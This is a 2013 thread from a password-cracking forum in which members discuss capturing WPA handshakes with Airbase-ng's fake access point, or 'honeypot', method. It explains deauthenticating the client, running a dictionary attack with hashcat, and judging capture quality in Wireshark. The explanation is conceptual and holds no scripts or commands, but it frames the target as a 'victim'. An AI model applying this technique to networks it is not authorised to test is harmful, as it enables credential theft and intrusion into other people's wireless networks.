NEW: We have a Discord server now. Click here to go there now!

NOTE: Why not use our List Manager to crack your lists? Its easy and enables better management.

NOTE: When cracking WPA/WPA2 passwords, make sure you check gpuhash.me first incase it's already been processed.

Home - Wireless Cracking - Airbase WPA Capture Fail


12 Results - Page 1 of 1 -
1
Author Message
Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sat, 30 Nov 2013 @ 18:42:54

Does anyone here use Airbase ? Thought I should mention this here in case some of you are working on captures using Airbase and wondering why you cannot break them.

I have been some time experimenting with it to capture a WPA handshake and just come to the conclusion it doesn't work as expected

As far as I knew, Airbase could be used to capture a WPA handshake from a client even when the AP was out of range.

So today I turned off my AP and set up Airbase with the same MAC, ESSID, Crypto type and channel as my normal AP.

I then set Airbase running and also Airodump and used my laptop to connect to it. Airodump captured the handshake and I was overjoyed

I thought just how useful this could be for those difficult to reach penetration testing jobs

For some reason I decided to see the process through to the end just to make sure everything was ok. I converted the .cap to hccap and used oclhashcat to break it. I made certain my WPA password was in the list.

Well you can probably guess the rest, I couldn't break it even with my wifi password in the list.

So is this normal ? Have I misunderstood what Airbase was supposed to do ?

Is there any other method for capturing a genuine handshake from a client when the AP is absent ?

Thanks.


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 307 Reputation
Offline
Sat, 30 Nov 2013 @ 21:22:34

Unfortunetly I cannot help. I have never used Airbase-ng or set up a fake AP. But I can give you some tips and some information of background if you wish.

Hash-IT said:

So today I turned off my AP and set up Airbase with the same MAC, ESSID, Crypto type and channel as my normal AP.


You don't need to use the same MAC and the same channel. Just ESSID and encryption are enough. If you don't know the encyption then you can set up an AP for every encryption type you want (Open, WEP, WPA, WPA2...).

Hash-IT said:

I then set Airbase running and also Airodump and used my laptop to connect to it. Airodump captured the handshake and I was overjoyed


I don't know if you are supposed to use airodump-ng to do this.

Hash-IT said:

For some reason I decided to see the process through to the end just to make sure everything was ok. I converted the .cap to hccap and used oclhashcat to break it. I made certain my WPA password was in the list.


I'm glad you did it and didn't take for granted it would have worked. It's part of the learning process. Just for testing, try to run Aircrack-ng on your CAP. Don't convert it to HCCAP and then use Hashcat.

Hash-IT said:

So is this normal ? Have I misunderstood what Airbase was supposed to do ?


You can definitly do it with Airbase-ng. Search on the net for 'honeypot'. There should be some tutorials.

Hash-IT said:

Is there any other method for capturing a genuine handshake from a client when the AP is absent ?


Nope. The whole process is based on the fake AP and the client authentication. I can write up a minimal... let's say proof of concept why this works (or it should be working).


Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sat, 30 Nov 2013 @ 21:54:35

Hi hash-ire thanks for your help

I tried just using Aircrack on the .cap before converting it, same result

I found this which suggests using Airodump to capture the handshake wth Airbase.

http://www.aircrack-ng.org/doku.php?id=airbase-ng

Thinking about it I am not sure how we can establish a proper handshake when the AP doesn't know the PSK. Unless it is only the client who has to prove they have the PSK.

Actually I think that is it, the handshake is to only establish a connection, the rest is encrypted locally using the PSK. If one of the two (client or AP) does not know the PSK then things will go no further.

Hmm... So I wonder why I could not break a known PSK in my test ?

Very much looking forward to your reply hash-ire


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sat, 30 Nov 2013 @ 22:02:30

I hope you can find this thread hash-ire, I moved it to a more appropriate section. I will give myself a -1 LOL


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sat, 30 Nov 2013 @ 22:24:38

Oh now this is interesting.

IT WORKS !

I was using an old wifi dongle on kali earlier, an old Belkin one. I have just tried my Alpha dongle and tried again and it all works ok !

This is worrying as airodump said I had a complete capture when I clearly hadn't.

If this was &quotin the wild&quot I would have never known that the .cap was unbreakable even if I did have the password.

I wish there was a way to know for certain if I have a good capture before using oclhashcat.

I hope I haven't wasted too much of your time hash-ire


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 307 Reputation
Offline
Sun, 01 Dec 2013 @ 13:50:08

Here's a bit of background:

When you connect to a network, settings like ESSID, the KEY and the encryption are cached and stored in your device. That's why when you just simply turn on your wifi it automatically connects to the network. That's pretty convinient since you don't need everytime to manually set the password when the wireless disconnect and reconnect. Disconnections are really frequent in wifi e.g. when you move, when there are multiple APs or because of interferences.

The interesting part is that when you turn on the wifi or when there aren't networks nearby, the client automatically sends in the air probe requests. You can see them when you sniffing the air with airodump-ng (in the part below when there's written not associated). The client is simply searching for APs which has been previously connected to.
Basically a probe request for a client is something saying: 'is there around an AP which I have been connected to previously? If YES, say HI!'. So you can connect. So every probe request shows to anyone every ESSID of the networks you have ever been connected to.

What a malicious user can do (yes, it's you) is to set up a fake access point, called honeypot (you can easily guess why), with the same ESSID of a network your victim client has been connected to. Of course you need to use the same encryption algorithm (Open, WEP, WPA, WPA2...) but you can just set up a bunch of different APs with the same ESSID but with different encryption types. Infact the probe request packet does not contain the information about encryption type itself.

NOTE: you can create multiple monitor mode interfaces on the same physical card even on different channels. The card will automatically multiplexes between different channels. It's called TDM (Time Division Multiplexing).
Let's look the 4-way handshake again to undestand if it's possible to do what we claim.

We have:
- ANonce (random value)
- SNonce + MIC (MIC is like a signature algorithm)
- Key installation
- Key ACK

There are 4 packets for the 4-way handshake.
- packets 1 - 3 both contains ANonce
- packets 2 - 4 both contains SNonce

The Nonce value in the other 2 packets (3 - 4) means only they belong to the same handshake.

The encryption process is made in this way:
passphrase (8-63) -> PBKDF2(SSID) -> Pre-shared key 256 bit -> 4-way handshake (ANonce, SNonce, AP MAC, Client MAC) -> PTK -> MIC (used to verify if the password matches).

As we have a fake AP we don't know the Pre-Shared Key (256 bit).

Basically the process takes place as follows:
- The victim client sees your AP and it associated to it.
- Then the fake AP sends to the client the ANonce (message 1) wich is just a large random number. Everybody can do that, you don't need the key.

Now there's no way for the client to know that your AP is not the real one.

- So the client sends you message 2 with SNonce + MIC

At this point as we don't have the key we cannot validate the connection. So what we do is that we drop the connection. We de-authenticate the client.

So what we have now is:
- ANonce (we generated it)
- SNonce
- the AP MAC (of course)
- the client MAC

So what are we doing now? The dictionary attack! We have all the information we need.


Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 01 Dec 2013 @ 13:54:49

Thank you VERY much for this hash-ire !! I have copied and saved your excellent post ! +1

hash-ire said:

What a malicious user can do (yes, it's you)

Cheeky !!


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 307 Reputation
Offline
Sun, 01 Dec 2013 @ 13:59:00

I'll write something about good handshakes on my next post. Most of my writing will be about my thoughts as I don't have a complete knowledge on these arguments.

Stay tuned.


Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sun, 01 Dec 2013 @ 14:04:50

hash-ire said:

I'll write something about good handshakes on my next post. Most of my writing will be about my thoughts as I don't have a complete knowledge on these arguments.

Stay tuned.


Your posts &quotor thoughts&quot as you call them are so good I think you should have your own tutorial section on here

It seems a waste hiding your posts in my threads, I think you should start a series of your own threads.

If you write them out I will make them sticky in this section.

Awesome work and thank you very much.


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E

Avatar
hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 307 Reputation
Offline
Fri, 06 Dec 2013 @ 20:57:44

Hash-IT said:

Your posts "or thoughts" as you call them are so good I think you should have your own tutorial section on here

It seems a waste hiding your posts in my threads, I think you should start a series of your own threads.

If you write them out I will make them sticky in this section.

Awesome work and thank you very much.


Thank you. The time will probably come. It's also easier for me to remeber things when they're written . But, I'm pretty busy at the moment so i don't know when I'll do that.


Avatar
hash-ire

Status: Member
Joined: Mon, 19 Aug 2013
Posts: 257
Team:
Reputation: 307 Reputation
Offline
Fri, 06 Dec 2013 @ 21:03:53

At long last, the good handshakes talking.
As I said in my other post, in order to crack a handshake you actually need the 2 first packets of the process: message 1 and message 2.
Message 1:
- ANonce (Access point Nonce)
Message 2:
- SNonce (Station Nonce)
- Michael Key (MIC)
Here's a good cleaned capture file. I know for sure it's good because I have managed to break it. For the cleaning I have used wpaclean, a tool wich is already installed in Backtrack and Kali distros.

As we can see we have message 1 and 2 and a beacon frame. Why a beacon frame? Because the ESSID of the network it is involved in the process too. It used like a salt basically. That's why exist rainbow tables for specific ESSIDs.
So, tools like wpa clean will retain a beacon frame from the capture matching ESSID/BSSID from the 4-way hanshake packets.
Now let's take a look how a good hanshake should look (in appareance) using wireshark.

We have the first message with the Nonce (it is intended to be the ANonce). There's no MIC: the field is fille with zeroes.

Here, in the second message we have the other Nonce (SNonce) and the Michael Key.
Apparently it's good. We have all the data we needed.
Now, before I go on with this, the funny part. The following capture file I'll show you is an handshake I tried to break for many hours. Then, while making this tutorial I have decided 'to take a look inside it' and... disappointment! It is a bad capture indeed.

This is the cleaned file. We have message 2 and...? Well that's not what I exptected. It's not very promising, is it? Let's take a look more in depth in the full capture file (not the cleaned one). By using the 'eapol' filter we can display the packets related to the authentication process.

The highlighted packet doesn't have an indication which specify its role in the 4-way handshake. There's no (Message * of *). So I saw the Nonce and the MIC and I thought it had to be the second message. Moreover it is between other second messages. The problem is that the packet is sent from Netgear (the AP) and the Samsung device (the client). So it can't be.

Let's look at message 2/4. Now we now for sure it is the second message but... what? The Nonce value is zero?
The conclusion:
I admit this is really a bad handshake. It's not complete (the majority of the fields make no sense to me) and between message 1 and message 2, there's an enormous gap in the sequence numbers.

The purpose of all my saying was to prove that bad handshakes DO exist indeed. The one above was sniffed by me in a 'real session'. There was no meaning to make it noisy, though the rx signal wasn't really high.
Aircrack-ng sees it as 'good'. Same thing for wpaclean.
But, let's keep talking .

At this point while looking from packet to packet I noticed there was not a sort of identifier between the authentication sessions. In order to get the hanshake you may have been trying disconnecting a client multiple times. This may invole capturing multiple times the first two messages (1 and 2) but for different sessions. How can you match together messages from the same session by knowing you're doing it? Well, apparently you can't.

After all my experiments I read this article: http://www.exploresecurity.com/william-wpawpa2-4-way-handshake-extraction-script/. You may want to read it too. There's even in the hashcat wiki.

I close this talking here for now. There are probably tons of grammatical errors in this post. Bear with me, I'm pretty tired tonight.


Avatar
Hash-IT

Status: Trusted
Joined: Tue, 02 Aug 2011
Posts: 4598
Team: HashKiller
Reputation: 2982 Reputation
Offline
Sat, 07 Dec 2013 @ 18:28:26

Yet again another great post hash-ire.

When you get time to write them as a tutorial rather than a reply to me please contact me via PM and lets see about making these a sticky tutorial section

I have only one small comment about the above, wpaclean has always caused me more trouble than it was worth. As far as I know others have had issues with it also.

Thanks


Please read the forum rules. | Please read the paid section rules.

BTC: 1MmWESN5bKZ1YSuHrm5uNwnQYxWyQnEQ6E


12 Results - Page 1 of 1 -
1

We have a total of 212227 messages in 26024 topics.
We have a total of 23022 registered users.
Our newest registered member is guy426.